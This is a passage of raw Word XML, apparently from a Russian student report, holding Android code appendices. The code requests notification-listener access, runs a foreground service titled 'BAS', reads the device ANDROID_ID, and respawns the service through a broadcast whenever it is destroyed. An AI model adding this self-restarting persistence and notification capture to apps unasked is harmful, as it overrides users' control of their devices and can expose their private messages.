                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>enabledNotificationListeners</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.contains(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>packageName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requestNotificationPermissionIfNeed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w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            startActivity(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ACTION_NOTIFICATION_LISTENER_SETTINGS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627A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>getNotGrantedPermissions</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PackageInfo </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">packageInfo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 permissions =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Context context </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>= getApplicationContext();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try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packageInfo = getPackageManager().getPackageInfo(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>context</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">.getPackageName(),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GET_PERMISSIONS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permissions = packageInfo.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="871094"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>requestedPermissions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catch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NameNotFoundException </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ex) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            ex.printStackTrace();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ArrayList&lt;&gt;();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for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String permission </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>: permissions)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int </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ContextCompat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checkSelfPermission</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PERMISSION_GRANTED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.add(</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getNotGrantedPermissions();</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makeText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w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="067D17"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Для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работы</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приложения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необходимо</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предоставить</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разрешения</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="067D17"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w: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LENGTH_LONG</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).show();</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ActivityCompat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requestPermissions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.toArray(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.size()]),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1750EB"/>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createNotificationChannel</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NotificationChannel serviceChannel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NotificationChannel(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>CHANNEL_ID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"Example Service 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IMPORTANCE_DEFAULT</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NotificationManager manager </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>= getSystemService(</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manager</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.createNotificationChannel(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>serviceChannel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w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>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android.app.PendingIntent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android.os.IBinder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android.provider.Settings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androidx.annotation.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9E880D"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nullable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androidx.core.app.NotificationCompat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MainService </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">extends </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Service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static </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Context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onCreate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super</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.onCreate();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int </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>onStartCommand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 xml:space="preserve">intent, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">flags, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>startId) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intent notificationIntent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PendingIntent pendingIntent </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </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i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getActivity</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w: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 xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>notificationIntent</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Notification notification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00000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NotificationCompat</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.Builder(</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i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CHANNEL_ID</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                .setContentTitle(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"BAS"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                .setContentText(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Service is running..."</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                .setSmallIcon(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>drawable</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ic_android</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                .setContentIntent(</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color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                .build();</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        startForeground(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1750EB"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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i/>
                <w:iC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080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getString</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871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ANDROID_ID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start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START_NOT_STICKY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onDestroy</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"MainService.onDestroy()"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super</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.onDestroy();</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        sendBroadcast(</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67D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"respawnService"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@Nullable</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9E880D"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    @Override</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9E880D"/>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IBinder </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>onBind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33B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>return 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Context </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getContext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android.content.BroadcastReceiver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android.os.Build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ServiceReciever </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">extends </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">BroadcastReceiver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onReceive</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 xml:space="preserve">context, </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0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intent _intent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 xml:space="preserve">Intent(context,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w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SDK_INT </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;= </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VERSION_CODES</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            context.startForegroundService(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w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            context.startService(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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB60A5" w:rsidRP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rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0054048E" w:rsidRDefault="0054048E" w:rsidP="0054048E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc61505580"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖ</w:t>
      </w:r>
      <w:r w:rsidRPr="000853C0">
        <w:t>ЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Б</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRPr="001E447A" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Исходный код возобновляемого сервиса</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF" w:rsidTr="001E447A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344"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i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="174AD4"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>xml version</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">="1.0" </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="174AD4"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>encoding</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>="utf-8"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">manifest </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="174AD4"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>xmlns:</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>android</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>="http://schemas.android.com/apk/res/android"</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="174AD4"/>
